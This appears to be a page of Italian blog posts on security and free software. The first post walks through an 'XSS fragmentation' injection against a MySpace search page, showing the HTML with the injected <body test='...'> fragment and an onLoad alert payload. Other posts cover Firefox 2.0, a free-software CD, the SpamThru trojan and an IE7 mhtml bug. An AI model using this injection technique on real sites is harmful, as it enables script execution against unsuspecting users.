XSS Fragmentation Attacks

E’ stato scoperto, qualche giorno fa, da kuza55 un XSS 0day su MySpace.

L’XSS scoperto riguardava una pagina dove vengono immessi vari valori che riguardano il visitatore e servono per cercare altre persone con i soliti interessi, hobbies…
Quella che segue è la parte della pagina interessata dall’XSS, in grassetto sono le parti modificabili tramite url:

<tr id=MusicRow>
<td valign=”top” align=”left” width=”100″
bgcolor=”#b1d0f0″><span
class=”lightbluetext8″>Music</span></td>
<td id=”ProfileMusic” width=”175″ bgcolor=”#d5e8fb”
style=”WORD-WRAP: break-word”>Music Goes Here!</td>
</tr>
<script
language=”JavaScript”>highlightInterests(“ProfileMusic”);</script>
<tr id=FilmsRow>
<td valign=”top” align=”left” width=”100″
bgcolor=”#b1d0f0″><span
class=”lightbluetext8″>Films</span></td>
<td id=”ProfileFilms” width=”175″ bgcolor=”#d5e8fb”
style=”WORD-WRAP: break-word”>Films Go Here!</td>
</tr>

A questo punto cerchiamo di togliere tutti i tag che stanno tra le due stringhe modificabili per poter iniettare un comando, come ad esempio onload=”alert(‘XSS’);

A questo punto racchiudiamo dentro un parametro fittizio tutti i dati che vogliamo togliere:

<tr id=MusicRow>
<td valign=”top” align=”left” width=”100″
bgcolor=”#b1d0f0″><span
class=”lightbluetext8″>Music</span></td>
<td id=”ProfileMusic” width=”175″ bgcolor=”#d5e8fb”
style=”WORD-WRAP: break-word”><body test=’</td>
</tr>
<script
language=”JavaScript”>highlightInterests(“ProfileMusic”);</script>
<tr id=FilmsRow>
<td valign=”top” align=”left” width=”100″
bgcolor=”#b1d0f0″><span
class=”lightbluetext8″>Films</span></td>
<td id=”ProfileFilms” width=”175″ bgcolor=”#d5e8fb”
style=”WORD-WRAP: break-word”>‘>Films Go
Here!</td>
</tr>

Come noterete utilizzando <body test=’ e ‘> si sono tolti tutti i tag che potevano dar noia per iniettare il nostro XSS visto sopra. A questo punto sostituendo ‘>Films Go Here! con ‘ onLoad=”alert(‘XSS’);”> otterremo l’XSS!

Come ha detto kuza55 nel suo paper

The idea behind XSS fragmentation attacks is to have your normally non-dangerous code (e.g. onload=”alert(‘XSS’);”) placed in a dangerous position.

 

CD Software Libero per Windows e Macintosh [updated]

Il progetto, come tanti altri esistenti, si propone di raccogliere su un CD una collezione quanto più esaustiva possibile del miglior software libero o freeware in circolazione per la piattaforma MS Windows, e recentemente è iniziato il lavoro per creare un’analoga collezione per la piattaforma Apple OS X.

Grazie a questa raccolta sarà più semplice evangelizzare o avviare parenti o amici all’uso del FOSS.

Una occasione imminente per regalare questa raccolta su CD sarà il Linux Day che si svolgerà sabato 28 Ottobre.
Noi dell’ACROS abbiamo deciso di utilizzare questa raccolta anzichè quella di “The Open CD Italy” in quanto i programmi inseriti sono senza dubbio più recenti.
Ho attivato un mirror ufficiale per il progetto all’indirizzo http://files.matteocarli.com/CDautotool/ da dove è possibile scaricare direttamente una iso già pronta.

Aggiornamento: la raccolta di FOSS per Macintosh non sarà pronta per il Linux Day 2006.
Intanto è uscita la versione 1.7.2 per Windows. I programmi aggiornati sono: Firefox, TuxPaintStamps, TuxPaint, ImageMagick, Maxima, DemocracyPlayer e MediaCoder. Per maggiori dettagli invito a visitare il changelog.

 

Rilasciato Mozilla Firefox 2.0 [updated]

Anche se non ufficialmente (sul sito di Mozilla non compare ancora niente a riguardo) Firefox 2.0 è presente nei mirror.
Le novità di Firefox 2.0 sono molte, anche se alcune che erano state preventivate non sono state rilasciate; un esempio può essere la gestione dei bookmark e la cronologia tramite un engine in SQLite. La caratteristica più interessante inserita in questa versione è senza dubbio il controllo antiphishing relizzato in parthership con Google.
Il comunicato stampa ufficiale dovrebbe avvenire oggi nel pomeriggio.

Jeremiah Grossman, esperto di sicurezza in browser, pensa che basteranno solo 3 giorni ai ricercatori per trovare il primo bug sul nuovo “panda di fuoco”, vista anche la recente storia di IE7.

Aggiornamento: sul sito di Mozilla è stata inserita la news ufficiale.

Mozilla Firefox è un web browser Open Source multipiattaforma prodotto da Mozilla Foundation. La versione 1.0, dopo quasi due anni di sviluppo, è stata rilasciata il 9 novembre 2004. La versione 1.5, dopo un ulteriore anno di sviluppo, è stata rilasciata il 29 novembre 2005.

 

L’antivirus te lo installa il trojan!

Negli ultimi giorni si sta diffondendo un trojan SpamThru (alcuni vendor però lo chiamano diversamente).

Questo nuovo trojan crea una botnet di tipo peer to peer. Ciò gli assicura il funzionamento anche in caso che un nodo all’interno di essa cadesse o fosse disinfettato. Al momento dell’infezione, SpamThru, modifica il file %sysdir%\drivers\etc\hosts per non permettere a software anti virus (già installati) di scaricare le ultime definizioni di virus.
Assicuratosi del blocco degli aggiornamenti, il trojan, scarica dal control server (la macchina con il ruolo da master nella sua rete p2p) una DLL la quale avvia il download, sempre attraverso il control server, di una copia pirata di Kaspersky Antivirus. 10 minuti dopo aver scaricato KAV viene avviata la scansione di tutto il sistema alla ricerca di altri malaware installati. Al riavvio tutto il software malevolo rilevato verrà cancellato. Chiaramente SpamThru, esclude se stesso dalla scansione da parte di KAV.

Sicuramente chi ha scritto questo trojan sapeva che KAV ha le percentuali più alte nel riconoscere malaware.

Per chi volesse approfondire le informazioni su questo trojan può leggere l’interessante articolo scritto da Joe Stewart.

 

IE7 ringrazia IE6 per il primo suo bug

Uscito da poche ore IE7 nella versione final, è già presente negli archivi di Secunia per avere ereditato dal fratello più anziano un bug sul’url handler “mhtml:“. Tramite la riderezione non controllata di URI con questo handler è possibile richiedere pagine esterne al sito al quale stiamo accedendo senza che, l’utente se ne accorga.

La vulnerabilità non sembra molto pericolasa, ma pensate se un utente ha una sessione aperta con una webmail, una banca o ebay ma ne frattempo visita un sito preparato ad hoc: possono essere raccolte informazioni personali su di lui in maniera completamente stealth (a meno che non si abbia uno sniffer o un firewall).
Secunia segnala che il bug era questo scoperto originariamente su IE6 non è mai stato ufficialmente corretto.